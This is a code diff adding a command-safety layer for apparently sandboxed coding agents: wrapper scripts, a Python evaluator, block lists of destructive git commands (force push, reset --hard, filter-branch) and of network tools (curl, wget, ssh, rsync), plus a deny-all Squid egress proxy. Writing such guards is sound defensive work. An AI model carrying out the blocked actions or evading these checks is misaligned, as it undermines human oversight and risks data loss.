"$@" diff --git a/images/scc-base/wrappers/bin/sftp b/images/scc-base/wrappers/bin/sftp new file mode 100755 index 0000000..9e505ed --- /dev/null +++ b/images/scc-base/wrappers/bin/sftp @@ -0,0 +1,17 @@ +#!/bin/bash +set -euo pipefail + +# Absolute path to the real binary — prevents self-recursion +REAL_BIN=/usr/bin/sftp + +# Evaluate the command against safety policy +# PYTHONPATH is set by the Dockerfile to /usr/local/lib/scc +verdict=$(python3 -m scc_safety_eval "$(basename "$0")" "$@" 2>&1) || { + rc=$? + if [ "$rc" -eq 2 ]; then + echo "$verdict" >&2 + exit 2 + fi +} + +exec "$REAL_BIN" "$@" diff --git a/images/scc-base/wrappers/bin/ssh b/images/scc-base/wrappers/bin/ssh new file mode 100755 index 0000000..54092d6 --- /dev/null +++ b/images/scc-base/wrappers/bin/ssh @@ -0,0 +1,17 @@ +#!/bin/bash +set -euo pipefail + +# Absolute path to the real binary — prevents self-recursion +REAL_BIN=/usr/bin/ssh + +# Evaluate the command against safety policy +# PYTHONPATH is set by the Dockerfile to /usr/local/lib/scc +verdict=$(python3 -m scc_safety_eval "$(basename "$0")" "$@" 2>&1) || { + rc=$? + if [ "$rc" -eq 2 ]; then + echo "$verdict" >&2 + exit 2 + fi +} + +exec "$REAL_BIN" "$@" diff --git a/images/scc-base/wrappers/bin/wget b/images/scc-base/wrappers/bin/wget new file mode 100755 index 0000000..da1f205 --- /dev/null +++ b/images/scc-base/wrappers/bin/wget @@ -0,0 +1,17 @@ +#!/bin/bash +set -euo pipefail + +# Absolute path to the real binary — prevents self-recursion +REAL_BIN=/usr/bin/wget + +# Evaluate the command against safety policy +# PYTHONPATH is set by the Dockerfile to /usr/local/lib/scc +verdict=$(python3 -m scc_safety_eval "$(basename "$0")" "$@" 2>&1) || { + rc=$? + if [ "$rc" -eq 2 ]; then + echo "$verdict" >&2 + exit 2 + fi +} + +exec "$REAL_BIN" "$@" diff --git a/images/scc-base/wrappers/scc_safety_eval/__init__.py b/images/scc-base/wrappers/scc_safety_eval/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/images/scc-base/wrappers/scc_safety_eval/__main__.py b/images/scc-base/wrappers/scc_safety_eval/__main__.py new file mode 100644 index 0000000..7dcfefc --- /dev/null +++ b/images/scc-base/wrappers/scc_safety_eval/__main__.py @@ -0,0 +1,42 @@ +"""CLI entry point for the standalone safety evaluator. + +Usage: python3 -m scc_safety_eval [args...] + +Exit codes: + 0 — command allowed + 2 — command blocked (reason printed to stderr) + 2 — unexpected error (fail-closed) +""" + +from __future__ import annotations + +import sys + + +def main() -> int: + """Evaluate a command and exit with the appropriate code.""" + try: + from .engine import DefaultSafetyEngine + from .policy import load_policy + + if len(sys.argv) < 2: + print("Usage: python3 -m scc_safety_eval [args...]", file=sys.stderr) + return 2 + + policy = load_policy() + command = " ".join(sys.argv[1:]) + engine = DefaultSafetyEngine() + verdict = engine.evaluate(command, policy) + + if verdict.allowed: + return 0 + + print(verdict.reason, file=sys.stderr) + return 2 + + except Exception as exc: # noqa: BLE001 — fail-closed + print(f"scc_safety_eval: unexpected error: {exc}", file=sys.stderr) + return 2 + + +sys.exit(main()) diff --git a/images/scc-base/wrappers/scc_safety_eval/contracts.py b/images/scc-base/wrappers/scc_safety_eval/contracts.py new file mode 100644 index 0000000..56eb647 --- /dev/null +++ b/images/scc-base/wrappers/scc_safety_eval/contracts.py @@ -0,0 +1,42 @@ +"""Stripped-down contracts for the standalone safety evaluator. + +Contains only SafetyPolicy and SafetyVerdict — the minimal surface +needed for runtime safety evaluation without any host CLI dependency. +""" + +from __future__ import annotations + +from dataclasses import dataclass, field +from typing import Any + + +@dataclass(frozen=True) +class SafetyPolicy: + """Normalized safety policy available to runtime and adapter layers. + + Attributes: + action: Baseline action when a guarded command is matched. + rules: Boolean or scalar rule settings keyed by stable rule name. + source: Where the policy originated, such as org.security.safety_net. + """ + + action: str = "block" + rules: dict[str, Any] = field(default_factory=dict) + source: str = "org.security.safety_net" + + +@dataclass(frozen=True) +class SafetyVerdict: + """Decision produced by safety evaluation for one attempted action. + + Attributes: + allowed: Whether the action is permitted. + reason: User-facing reason for the decision. + matched_rule: Stable rule identifier, if any. + command_family: High-level command family, if known. + """ + + allowed: bool + reason: str + matched_rule: str | None = None + command_family: str | None = None diff --git a/images/scc-base/wrappers/scc_safety_eval/engine.py b/images/scc-base/wrappers/scc_safety_eval/engine.py new file mode 100644 index 0000000..94f210f --- /dev/null +++ b/images/scc-base/wrappers/scc_safety_eval/engine.py @@ -0,0 +1,121 @@ +"""Default safety engine orchestrating shell tokenization, git rules, and network tool rules. + +Implements the SafetyEngine protocol from ports/safety_engine.py. +All evaluation is provider-neutral: both Claude and Codex adapters +consume this engine downstream. +""" + +from __future__ import annotations + +from pathlib import PurePosixPath + +from .contracts import SafetyPolicy, SafetyVerdict +from .git_safety_rules import analyze_git +from .network_tool_rules import analyze_network_tool +from .shell_tokenizer import extract_all_commands + +# Maps matched_rule identifiers to SafetyPolicy.rules keys. +# fail-closed: if the key is missing from policy.rules, the rule is enabled. +_MATCHED_RULE_TO_POLICY_KEY: dict[str, str] = { + "git.force_push": "block_force_push", + "git.push_mirror": "block_push_mirror", + "git.reset_hard": "block_reset_hard", + "git.branch_force_delete": "block_branch_force_delete", + "git.stash_drop": "block_stash_drop", + "git.stash_clear": "block_stash_clear", + "git.clean_force": "block_clean_force", + "git.checkout_path": "block_checkout_path", + "git.restore_worktree": "block_restore_worktree", + "git.reflog_expire": "block_reflog_expire", + "git.gc_prune": "block_gc_prune", + "git.filter_branch": "block_filter_branch", +} + + +def _matched_rule_to_policy_key(matched_rule: str) -> str | None: + """Map a matched_rule identifier to its policy key. + + Args: + matched_rule: Rule identifier like 'git.force_push' or 'network.curl'. + + Returns: + Policy key like 'block_force_push', or None if no mapping exists. + """ + return _MATCHED_RULE_TO_POLICY_KEY.get(matched_rule) + + +class DefaultSafetyEngine: + """Provider-neutral command safety evaluator. + + Orchestrates shell tokenization, git rules, and network tool rules + into a single evaluate() call that satisfies the SafetyEngine protocol. + """ + + def evaluate(self, command: str, policy: SafetyPolicy) -> SafetyVerdict: + """Evaluate a command string against the given safety policy. + + Args: + command: Shell command string to evaluate. + policy: Safety policy containing rules and baseline action. + + Returns: + A typed verdict indicating whether the command is allowed. + """ + # Empty/whitespace commands are always safe + if not command or not command.strip(): + return SafetyVerdict(allowed=True, reason="Empty command") + + # Policy action "allow" bypasses all rules + if policy.action == "allow": + return SafetyVerdict(allowed=True, reason="Policy action is allow") + + # Tokenize and check all sub-commands (handles pipes, &&, bash -c nesting) + for tokens in extract_all_commands(command): + if not tokens: + continue + + # Check git rules: is the first token (path-stripped) 'git'? + first_bare = PurePosixPath(tokens[0]).name + if first_bare == "git": + verdict = analyze_git(tokens) + if verdict is not None and not verdict.allowed: + return self._apply_policy(verdict, policy) + + # Check network tool rules + net_verdict = analyze_network_tool(tokens) + if net_verdict is not None and not net_verdict.allowed: + return self._apply_policy(net_verdict, policy) + + return SafetyVerdict(allowed=True, reason="No safety rules matched") + + def _apply_policy(self, verdict: SafetyVerdict, policy: SafetyPolicy) -> SafetyVerdict: + """Apply policy overrides to a block verdict. + + Checks if the rule is disabled in policy.rules. If the policy + action is 'warn', converts block to allowed with WARNING prefix. + Missing keys default to True (fail-closed: rule enabled). + """ + # Check if this specific rule is disabled in the policy + if verdict.matched_rule is not None: + policy_key = _matched_rule_to_policy_key(verdict.matched_rule) + if policy_key is not None: + rule_enabled = policy.rules.get(policy_key, True) + if not rule_enabled: + return SafetyVerdict( + allowed=True, + reason=f"Rule {verdict.matched_rule} disabled by policy", + matched_rule=verdict.matched_rule, + command_family=verdict.command_family, + ) + + # Warn mode: allow but prefix reason + if policy.action == "warn": + return SafetyVerdict( + allowed=True, + reason=f"WARNING: {verdict.reason}", + matched_rule=verdict.matched_rule, + command_family=verdict.command_family, + ) + + # Default: return the block verdict as-is + return verdict diff --git a/images/scc-base/wrappers/scc_safety_eval/enums.py b/images/scc-base/wrappers/scc_safety_eval/enums.py new file mode 100644 index 0000000..35c7107 --- /dev/null +++ b/images/scc-base/wrappers/scc_safety_eval/enums.py @@ -0,0 +1,16 @@ +"""Stripped-down enums for the standalone safety evaluator. + +Contains only CommandFamily — the minimal surface needed for +runtime safety classification without any host CLI dependency. +""" + +from __future__ import annotations + +from enum import Enum + + +class CommandFamily(str, Enum): + """High-level command family for safety classification.""" + + DESTRUCTIVE_GIT = "destructive-git" + NETWORK_TOOL = "network-tool" diff --git a/images/scc-base/wrappers/scc_safety_eval/git_safety_rules.py b/images/scc-base/wrappers/scc_safety_eval/git_safety_rules.py new file mode 100644 index 0000000..e87a782 --- /dev/null +++ b/images/scc-base/wrappers/scc_safety_eval/git_safety_rules.py @@ -0,0 +1,527 @@ +"""Git command analysis for detecting destructive operations. + +This module analyzes git commands and returns typed SafetyVerdict objects +for destructive operations that could damage remote history or local work. + +Lifted from the scc-safety-net plugin into core. All analyze_* functions +return SafetyVerdict | None instead of raw strings. + +Blocked operations (v0.2.0): +- git push --force / -f / +refspec +- git push --mirror +- git reset --hard +- git branch -D +- git stash drop / clear +- git clean -f / -fd / -xfd +- git checkout -- +- git restore (worktree, not --staged) +- git reflog expire --expire-unreachable=now +- git gc --prune=now +- git filter-branch (always blocked) +""" + +from __future__ import annotations + +from collections.abc import Callable +from pathlib import Path + +from .contracts import SafetyVerdict +from .enums import CommandFamily + +# ───────────────────────────────────────────────────────────────────────────── +# Git Global Option Handling +# ───────────────────────────────────────────────────────────────────────────── + +# Git global options that take a value (skip both flag and value) +GIT_GLOBAL_OPTIONS_WITH_VALUE = frozenset({"-C", "-c", "--git-dir", "--work-tree"}) + +# Git global options that combine flag=value +GIT_GLOBAL_OPTIONS_COMBINED = ("--git-dir=", "--work-tree=") + + +def normalize_git_tokens(tokens: list[str]) -> tuple[str, list[str]]: + """Extract subcommand and args, skipping global git options. + + Handles: + - /usr/bin/git → git + - git -C /path push → push + - git --git-dir=.git push → push + + Args: + tokens: Full command tokens starting with git + + Returns: + Tuple of (subcommand, remaining_args) + """ + if not tokens: + return "", [] + + # Check if first token is git (handle /usr/bin/git) + if Path(tokens[0]).name != "git": + return "", [] + + i = 1 + while i < len(tokens): + token = tokens[i] + + # Handle -C, -c, --git-dir, --work-tree (with separate value) + if token in GIT_GLOBAL_OPTIONS_WITH_VALUE: + i += 2 # Skip option and its value + # Handle --git-dir=.git, --work-tree=/path + elif any(token.startswith(prefix) for prefix in GIT_GLOBAL_OPTIONS_COMBINED): + i += 1 # Skip combined option=value + else: + break + + if i >= len(tokens): + return "", [] + + return tokens[i], tokens[i + 1 :] + + +# ───────────────────────────────────────────────────────────────────────────── +# Force Push Detection +# ───────────────────────────────────────────────────────────────────────────── + + +def has_force_flag(args: list[str]) -> bool: + """Detect force flags including combined short options. + + Matches: -f, --force, -xfd (contains -f) + + IMPORTANT: Only apply this function for git subcommands where -f + means "force" (push, clean, branch -D). Do NOT apply globally - + some subcommands use -f for different meanings. + + Args: + args: Command arguments (after subcommand) + + Returns: + True if force flag detected + """ + for token in args: + if token == "-f" or token == "--force": + return True + # Combined short flags: -xfd contains -f + # Must start with - but not -- (long options) + if token.startswith("-") and not token.startswith("--") and "f" in token: + return True + return False + + +def has_force_refspec(args: list[str]) -> bool: + """Detect force push via +refspec patterns. + + Matches: +main, +main:main, HEAD:+main, origin/+main + + Args: + args: Command arguments (after subcommand) + + Returns: + True if +refspec force push pattern detected + """ + for token in args: + # Skip flags + if token.startswith("-"): + continue + # +ref at start of token + if token.startswith("+") and not token.startswith("++"): + return True + # ref:+ref pattern (e.g., HEAD:+main) + if ":+" in token: + return True + return False + + +def has_force_with_lease(args: list[str]) -> bool: + """Check if --force-with-lease is present (safe force push). + + Args: + args: Command arguments + + Returns: + True if --force-with-lease is present + """ + return any(arg.startswith("--force-with-lease") for arg in args) + + +# ───────────────────────────────────────────────────────────────────────────── +# Destructive Command Detection +# ───────────────────────────────────────────────────────────────────────────── + +# Block reasons with safe alternatives +BLOCK_MESSAGES: dict[str, str] = { + "force_push": ( + "BLOCKED: Force push destroys remote history.\n\n" + "Safe alternative: git push --force-with-lease" + ), + "push_mirror": ( + "BLOCKED: git push --mirror overwrites entire remote.\n\n" + "Safe alternative: git push (regular push)" + ), + "reflog_expire": ( + "BLOCKED: reflog expire --expire-unreachable=now destroys recovery history.\n\n" + "Safe alternative: Don't manually expire reflog; let Git handle it" + ), + "gc_prune": ( + "BLOCKED: git gc --prune=now immediately deletes objects.\n\n" + "Safe alternative: git gc (default prune with grace period)" + ), + "filter_branch": ( + "BLOCKED: git filter-branch rewrites history destructively.\n\n" + "Safe alternative: git filter-repo (external tool with safety checks)" + ), + "reset_hard": ( + "BLOCKED: git reset --hard destroys uncommitted changes.\n\n" + "Safe alternative: git stash (preserves changes)" + ), + "branch_force_delete": ( + "BLOCKED: git branch -D force-deletes without merge check.\n\n" + "Safe alternative: git branch -d (requires merge check)" + ), + "stash_drop": ( + "BLOCKED: git stash drop permanently deletes stash entry.\n\n" + "Safe alternative: Review with git stash list first" + ), + "stash_clear": ( + "BLOCKED: git stash clear permanently deletes ALL stashes.\n\n" + "Safe alternative: Review with git stash list first" + ), + "clean_force": ( + "BLOCKED: git clean -f destroys untracked files.\n\n" + "Safe alternative: git clean -n (dry-run preview)" + ), + "checkout_path": ( + "BLOCKED: git checkout -- destroys uncommitted changes.\n\n" + "Safe alternative: git stash (preserves changes)" + ), + "restore_worktree": ( + "BLOCKED: git restore destroys uncommitted changes.\n\n" + "Safe alternatives:\n" + " - git stash (preserves changes)\n" + " - git restore --staged (only unstages, doesn't discard)" + ), +} + +# Maps BLOCK_MESSAGES key → matched_rule identifier +_RULE_NAMES: dict[str, str] = { + "force_push": "git.force_push", + "push_mirror": "git.push_mirror", + "reflog_expire": "git.reflog_expire", + "gc_prune": "git.gc_prune", + "filter_branch": "git.filter_branch", + "reset_hard": "git.reset_hard", + "branch_force_delete": "git.branch_force_delete", + "stash_drop": "git.stash_drop", + "stash_clear": "git.stash_clear", + "clean_force": "git.clean_force", + "checkout_path": "git.checkout_path", + "restore_worktree": "git.restore_worktree", +} + + +def _block(key: str) -> SafetyVerdict: + """Build a block SafetyVerdict from a BLOCK_MESSAGES key.""" + return SafetyVerdict( + allowed=False, + reason=BLOCK_MESSAGES[key], + matched_rule=_RULE_NAMES[key], + command_family=CommandFamily.DESTRUCTIVE_GIT, + ) + + +def analyze_push(args: list[str]) -> SafetyVerdict | None: + """Analyze git push for destructive patterns. + + Blocks: + - git push --force + - git push -f + - git push +refspec + - git push --mirror + + Allows: + - git push --force-with-lease + """ + # Block --mirror (overwrites entire remote) + if "--mirror" in args: + return _block("push_mirror") + + # Allow --force-with-lease (safe) + if has_force_with_lease(args): + return None + + # Block --force, -f, or combined flags containing 'f' + if has_force_flag(args): + return _block("force_push") + + # Block +refspec patterns + if has_force_refspec(args): + return _block("force_push") + + return None + + +def analyze_reset(args: list[str]) -> SafetyVerdict | None: + """Analyze git reset for destructive patterns. + + Blocks: + - git reset --hard + + Allows: + - git reset (default mixed) + - git reset --soft + - git reset --mixed + """ + if "--hard" in args: + return _block("reset_hard") + return None + + +def analyze_branch(args: list[str]) -> SafetyVerdict | None: + """Analyze git branch for destructive patterns. + + Blocks: + - git branch -D (force delete) + - git branch --delete --force + + Allows: + - git branch -d (safe delete with merge check) + """ + # Check for -D specifically (uppercase) + if "-D" in args: + return _block("branch_force_delete") + + # Check for combined --delete --force + has_delete = "--delete" in args or any( + a.startswith("-") and not a.startswith("--") and "d" in a.lower() for a in args + ) + if has_delete and "--force" in args: + return _block("branch_force_delete") + + return None + + +def analyze_stash(args: list[str]) -> SafetyVerdict | None: + """Analyze git stash for destructive patterns. + + Blocks: + - git stash drop + - git stash clear + + Allows: + - git stash (push) + - git stash pop + - git stash apply + - git stash list + """ + if not args: + return None + + subcommand = args[0] + if subcommand == "drop": + return _block("stash_drop") + if subcommand == "clear": + return _block("stash_clear") + + return None + + +def analyze_clean(args: list[str]) -> SafetyVerdict | None: + """Analyze git clean for destructive patterns. + + Blocks: + - git clean -f + - git clean -fd + - git clean -xfd + - Any combination containing -f without -n/--dry-run + + Allows: + - git clean -n (dry-run) + - git clean --dry-run + """ + # Allow dry-run mode + has_dry_run = "-n" in args or "--dry-run" in args + if has_dry_run: + return None + + # Block any force flag (including combined like -xfd) + if has_force_flag(args): + return _block("clean_force") + + return None + + +def analyze_checkout(args: list[str]) -> SafetyVerdict | None: + """Analyze git checkout for destructive patterns. + + Blocks: + - git checkout -- + - git checkout HEAD -- + - git checkout -- (when reverting changes) + + Allows: + - git checkout (switching branches) + - git checkout -b (creating branch) + """ + if not args: + return None + + # Look for -- separator (indicates path checkout) + try: + separator_idx = args.index("--") + # If there are paths after --, this is a destructive path checkout + if separator_idx < len(args) - 1: + return _block("checkout_path") + except ValueError: + pass + + return None + + +def analyze_restore(args: list[str]) -> SafetyVerdict | None: + """Analyze git restore for destructive patterns. + + Blocks: + - git restore (worktree restore) + - git restore --worktree + + Allows: + - git restore --staged (only unstages) + """ + if not args: + return None + + # Allow --staged only (safe: just unstages) + has_staged = "--staged" in args or "-S" in args + has_worktree = "--worktree" in args or "-W" in args + + # If only --staged and not --worktree, it's safe + if has_staged and not has_worktree: + return None + + # Check if there are path arguments (non-flag arguments) + paths = [a for a in args if not a.startswith("-")] + if paths: + # Has paths and either: + # - explicit --worktree, or + # - no --staged (worktree is default for paths) + if has_worktree or not has_staged: + return _block("restore_worktree") + + return None + + +# ───────────────────────────────────────────────────────────────────────────── +# Catastrophic Command Detection (v0.2.0) +# ───────────────────────────────────────────────────────────────────────────── + + +def analyze_reflog(args: list[str]) -> SafetyVerdict | None: + """Analyze git reflog for destructive patterns. + + Blocks: + - git reflog expire --expire-unreachable=now + - git reflog expire --expire-unreachable now + + Allows: + - git reflog (show) + - git reflog show + - git reflog expire (without =now) + """ + if "expire" not in args: + return None + + # Handle both --expire-unreachable=now and --expire-unreachable now + for i, token in enumerate(args): + if "--expire-unreachable=now" in token: + return _block("reflog_expire") + if token == "--expire-unreachable": + if i + 1 < len(args) and args[i + 1] == "now": + return _block("reflog_expire") + + return None + + +def analyze_gc(args: list[str]) -> SafetyVerdict | None: + """Analyze git gc for destructive patterns. + + Blocks: + - git gc --prune=now + - git gc --prune now + + Allows: + - git gc (default prune with grace period) + - git gc --prune=2.weeks.ago + """ + # Handle both --prune=now and --prune now + for i, token in enumerate(args): + if "--prune=now" in token: + return _block("gc_prune") + if token == "--prune": + if i + 1 < len(args) and args[i + 1] == "now": + return _block("gc_prune") + + return None + + +def analyze_filter_branch(args: list[str]) -> SafetyVerdict | None: + """Analyze git filter-branch (always blocked). + + git filter-branch is always destructive and has been + deprecated in favor of git filter-repo. + + Blocks: + - git filter-branch (any invocation) + """ + # filter-branch is always destructive + return _block("filter_branch") + + +# ───────────────────────────────────────────────────────────────────────────── +# Main Analysis Entry Point +# ───────────────────────────────────────────────────────────────────────────── + + +def analyze_git(tokens: list[str]) -> SafetyVerdict | None: + """Analyze git command tokens for destructive operations. + + Args: + tokens: Command tokens starting with 'git' + + Returns: + SafetyVerdict if destructive, None if allowed + """ + subcommand, args = normalize_git_tokens(tokens) + + if not subcommand: + return None + + # Global DX bypass - check BEFORE any analyzer + # git help is always safe + if subcommand == "help": + return None + + # --help, -h, --version flags make any command safe (just shows help) + if "--help" in args or "-h" in args or "--version" in args: + return None + + # Route to specific analyzers + analyzers: dict[str, Callable[[list[str]], SafetyVerdict | None]] = { + "push": analyze_push, + "reset": analyze_reset, + "branch": analyze_branch, + "stash": analyze_stash, + "clean": analyze_clean, + "checkout": analyze_checkout, + "restore": analyze_restore, + # Catastrophic commands (v0.2.0) + "reflog": analyze_reflog, + "gc": analyze_gc, + "filter-branch": analyze_filter_branch, + } + + analyzer = analyzers.get(subcommand) + if analyzer: + return analyzer(args) + + return None diff --git a/images/scc-base/wrappers/scc_safety_eval/network_tool_rules.py b/images/scc-base/wrappers/scc_safety_eval/network_tool_rules.py new file mode 100644 index 0000000..960ae41 --- /dev/null +++ b/images/scc-base/wrappers/scc_safety_eval/network_tool_rules.py @@ -0,0 +1,53 @@ +"""Network tool detection rules for command safety analysis. + +V1 defense-in-depth layer: detects commands that invoke tools capable of +external network access. This is supplementary to topology+proxy enforcement — +it provides denial UX and audit signals when an agent attempts to shell out +to curl, wget, ssh, etc. + +References: D014, D015 in DECISIONS.md. +""" + +from __future__ import annotations + +from pathlib import PurePosixPath + +from .contracts import SafetyVerdict +from .enums import CommandFamily + +# Tools that access external network +NETWORK_TOOLS: frozenset[str] = frozenset({"curl", "wget", "ssh", "scp", "sftp", "rsync"}) + + +def analyze_network_tool(tokens: list[str]) -> SafetyVerdict | None: + """Check if the command invokes a known network access tool. + + Detects both bare names (curl) and path-qualified binaries + (/usr/bin/curl). The check applies to the first token only — + network tool names appearing as arguments are ignored. + + Args: + tokens: Command tokens (after wrapper stripping). + + Returns: + SafetyVerdict blocking the command if a network tool is detected, + None if the command is not a network tool. + """ + if not tokens or not tokens[0]: + return None + + # Strip path to get the bare binary name + tool_name = PurePosixPath(tokens[0]).name + + if tool_name in NETWORK_TOOLS: + return SafetyVerdict( + allowed=False, + reason=( + f"BLOCKED: {tool_name} may access external network. " + f"Network access is controlled by the egress proxy." + ), + matched_rule=f"network.{tool_name}", + command_family=CommandFamily.NETWORK_TOOL, + ) + + return None diff --git a/images/scc-base/wrappers/scc_safety_eval/policy.py b/images/scc-base/wrappers/scc_safety_eval/policy.py new file mode 100644 index 0000000..3d750a7 --- /dev/null +++ b/images/scc-base/wrappers/scc_safety_eval/policy.py @@ -0,0 +1,43 @@ +"""Fail-closed policy loader for the standalone safety evaluator. + +Reads safety policy from the path given by the SCC_POLICY_PATH +environment variable. Returns a fail-closed default (action='block', +no rules) when: + - SCC_POLICY_PATH is unset or empty + - The file does not exist + - The file contains malformed JSON +""" + +from __future__ import annotations + +import json +import os +import sys + +from .contracts import SafetyPolicy + +_FAIL_CLOSED = SafetyPolicy(action="block", rules={}) + + +def load_policy() -> SafetyPolicy: + """Load safety policy from SCC_POLICY_PATH, fail-closed on any error.""" + path = os.environ.get("SCC_POLICY_PATH", "") + if not path: + return _FAIL_CLOSED + + try: + with open(path, encoding="utf-8") as f: + data = json.load(f) + except (OSError, json.JSONDecodeError) as exc: + print(f"scc_safety_eval: policy load error: {exc}", file=sys.stderr) + return _FAIL_CLOSED + + if not isinstance(data, dict): + print("scc_safety_eval: policy file is not a JSON object", file=sys.stderr) + return _FAIL_CLOSED + + return SafetyPolicy( + action=data.get("action", "block"), + rules=data.get("rules", {}), + source=data.get("source", "org.security.safety_net"), + ) diff --git a/images/scc-base/wrappers/scc_safety_eval/shell_tokenizer.py b/images/scc-base/wrappers/scc_safety_eval/shell_tokenizer.py new file mode 100644 index 0000000..5bf6172 --- /dev/null +++ b/images/scc-base/wrappers/scc_safety_eval/shell_tokenizer.py @@ -0,0 +1,213 @@ +"""Shell command tokenization with bash -c recursion support. + +This module provides POSIX-compliant shell tokenization for analyzing +commands before execution. It handles: +- Command splitting on shell operators (;, &&, ||, |) +- POSIX tokenization via shlex.split() +- Wrapper stripping (sudo, env, command) +- Nested bash -c / sh -c command extraction (depth-limited) +""" + +from __future__ import annotations + +import re +import shlex +from collections.abc import Iterator + +# Max recursion depth for nested bash -c commands +MAX_RECURSION_DEPTH = 3 + +# Wrappers to strip before analysis +WRAPPER_COMMANDS = frozenset({"sudo", "env", "command", "nice", "nohup", "time"}) + +# Shell interpreters that take -c for command strings +SHELL_INTERPRETERS = frozenset({"bash", "sh", "zsh", "dash", "ksh"}) + +# Regex for splitting on shell operators (preserves the operators) +SHELL_OPERATOR_PATTERN = re.compile(r"\s*(;|&&|\|\||\|)\s*") + + +def split_commands(command: str) -> list[str]: + """Split a command string on shell operators. + + Args: + command: Full command string that may contain multiple commands + + Returns: + List of individual command segments (operators discarded) + + Example: + >>> split_commands("echo foo && git push --force; ls") + ['echo foo', 'git push --force', 'ls'] + """ + if not command or not command.strip(): + return [] + + # Split on operators but keep non-empty segments + segments = SHELL_OPERATOR_PATTERN.split(command) + + # Filter out operators and empty strings + return [ + seg.strip() for seg in segments if seg.strip() and seg.strip() not in (";", "&&", "||", "|") + ] + + +def tokenize(segment: str) -> list[str]: + """Tokenize a command segment using POSIX shell rules. + + Args: + segment: Single command segment (no shell operators) + + Returns: + List of tokens, or empty list on parse error + + Example: + >>> tokenize("git push --force origin main") + ['git', 'push', '--force', 'origin', 'main'] + """ + if not segment or not segment.strip(): + return [] + + try: + return shlex.split(segment) + except ValueError: + # Malformed quotes or other parse errors + return [] + + +def strip_wrappers(tokens: list[str]) -> list[str]: + """Remove command wrappers that don't affect the underlying command. + + Strips: sudo, env, command, nice, nohup, time + + Args: + tokens: List of command tokens + + Returns: + Tokens with wrappers removed from the front + + Example: + >>> strip_wrappers(['sudo', '-u', 'root', 'git', 'push']) + ['git', 'push'] + >>> strip_wrappers(['env', 'VAR=val', 'git', 'push']) + ['git', 'push'] + """ + if not tokens: + return [] + + result = list(tokens) + + while result: + cmd = result[0].split("/")[-1] # Handle /usr/bin/sudo + + if cmd not in WRAPPER_COMMANDS: + break + + # Remove the wrapper command + result.pop(0) + + # Skip wrapper-specific arguments + if cmd == "sudo": + # sudo can have flags like -u user, -E, etc. + while result and result[0].startswith("-"): + flag = result.pop(0) + # Flags that take an argument + if flag in ("-u", "-g", "-C", "-D", "-h", "-p", "-r", "-t", "-U"): + if result: + result.pop(0) + elif cmd == "env": + # env: skip VAR=val assignments and -i/-u flags + while result: + if "=" in result[0]: + result.pop(0) + elif result[0].startswith("-"): + flag = result.pop(0) + if flag in ("-u",) and result: + result.pop(0) + else: + break + elif cmd == "nice": + # nice: skip -n adjustment + if result and result[0] == "-n" and len(result) > 1: + result.pop(0) + result.pop(0) + elif result and result[0].startswith("-"): + result.pop(0) + # command, nohup, time: just remove the wrapper itself + + return result + + +def extract_bash_c(tokens: list[str]) -> str | None: + """Extract the command string from bash -c 'command' patterns. + + Args: + tokens: List of command tokens + + Returns: + The command string passed to -c, or None if not a bash -c pattern + + Example: + >>> extract_bash_c(['bash', '-c', 'git push --force']) + 'git push --force' + >>> extract_bash_c(['sh', '-c', 'echo hello']) + 'echo hello' + """ + if len(tokens) < 3: + return None + + # Check if first token is a shell interpreter + cmd = tokens[0].split("/")[-1] + if cmd not in SHELL_INTERPRETERS: + return None + + # Look for -c flag + try: + c_index = tokens.index("-c") + if c_index + 1 < len(tokens): + return tokens[c_index + 1] + except ValueError: + pass + + return None + + +def extract_all_commands( + command: str, + _depth: int = 0, +) -> Iterator[list[str]]: + """Extract all command token lists from a command string. + + Handles shell operators and bash -c nesting recursively. + + Args: + command: Command string to analyze + _depth: Internal recursion depth counter (do not set) + + Yields: + Token lists for each command found + + Example: + >>> list(extract_all_commands("bash -c 'git push -f'")) + [['bash', '-c', 'git push -f'], ['git', 'push', '-f']] + """ + if _depth > MAX_RECURSION_DEPTH: + return + + for segment in split_commands(command): + tokens = tokenize(segment) + if not tokens: + continue + + # Strip wrappers first + stripped = strip_wrappers(tokens) + if not stripped: + continue + + # Yield the stripped tokens + yield stripped + + # Check for bash -c patterns and recurse + nested_cmd = extract_bash_c(stripped) + if nested_cmd: + yield from extract_all_commands(nested_cmd, _depth + 1) diff --git a/images/scc-egress-proxy/Dockerfile b/images/scc-egress-proxy/Dockerfile new file mode 100644 index 0000000..f5b3caa --- /dev/null +++ b/images/scc-egress-proxy/Dockerfile @@ -0,0 +1,16 @@ +# scc-egress-proxy: Squid forward-proxy sidecar for enforced web-egress. +# The topology manager volume-mounts compiled ACL rules at runtime. +FROM alpine:3.19 + +RUN apk add --no-cache squid + +COPY squid.conf.template /etc/squid/squid.conf.template +COPY entrypoint.sh /entrypoint.sh +RUN chmod +x /entrypoint.sh + +EXPOSE 3128 + +HEALTHCHECK --interval=5s --timeout=3s --start-period=5s --retries=3 \ + CMD wget -q --spider http://localhost:3128 || exit 1 + +ENTRYPOINT ["/entrypoint.sh"] diff --git a/images/scc-egress-proxy/entrypoint.sh b/images/scc-egress-proxy/entrypoint.sh new file mode 100644 index 0000000..9e00267 --- /dev/null +++ b/images/scc-egress-proxy/entrypoint.sh @@ -0,0 +1,21 @@ +#!/bin/sh +# scc-egress-proxy entrypoint: assemble squid.conf and run Squid in foreground. +set -e + +CONF_TEMPLATE="/etc/squid/squid.conf.template" +CONF_TARGET="/etc/squid/squid.conf" +ACL_RULES="/etc/squid/acl-rules.conf" + +# Start from the template +cp "$CONF_TEMPLATE" "$CONF_TARGET" + +# If the topology manager volume-mounted ACL rules, inject them +# between the SCC_ACL_RULES_START and SCC_ACL_RULES_END markers. +if [ -f "$ACL_RULES" ]; then + sed -i "/^# SCC_ACL_RULES_START$/,/^# SCC_ACL_RULES_END$/{ + /^# SCC_ACL_RULES_START$/r $ACL_RULES + /^# SCC_ACL_RULES_END$/!d + }" "$CONF_TARGET" +fi + +exec squid -N -f "$CONF_TARGET" diff --git a/images/scc-egress-proxy/squid.conf.template b/images/scc-egress-proxy/squid.conf.template new file mode 100644 index 0000000..b82c6b9 --- /dev/null +++ b/images/scc-egress-proxy/squid.conf.template @@ -0,0 +1,24 @@ +# scc-egress-proxy: Squid forward-proxy configuration template. +# This file is processed by entrypoint.sh at container start. + +# --- Port configuration --- +http_port 0.0.0.0:3128 + +# --- Safe port ACLs --- +acl SSL_ports port 443 +acl Safe_ports port 80 443 +http_access deny !Safe_ports +http_access deny CONNECT !SSL_ports + +# --- SCC egress ACL rules (injected at runtime) --- +# SCC_ACL_RULES_START +# SCC_ACL_RULES_END + +# --- Terminal deny --- +http_access deny all + 